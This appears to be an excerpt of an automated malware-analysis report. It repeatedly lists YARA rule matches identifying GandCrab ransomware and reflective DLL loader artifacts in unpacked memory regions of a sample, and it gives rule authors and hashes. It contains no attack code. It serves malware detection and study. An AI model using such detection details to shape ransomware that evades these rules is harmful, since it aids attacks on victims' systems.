Source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
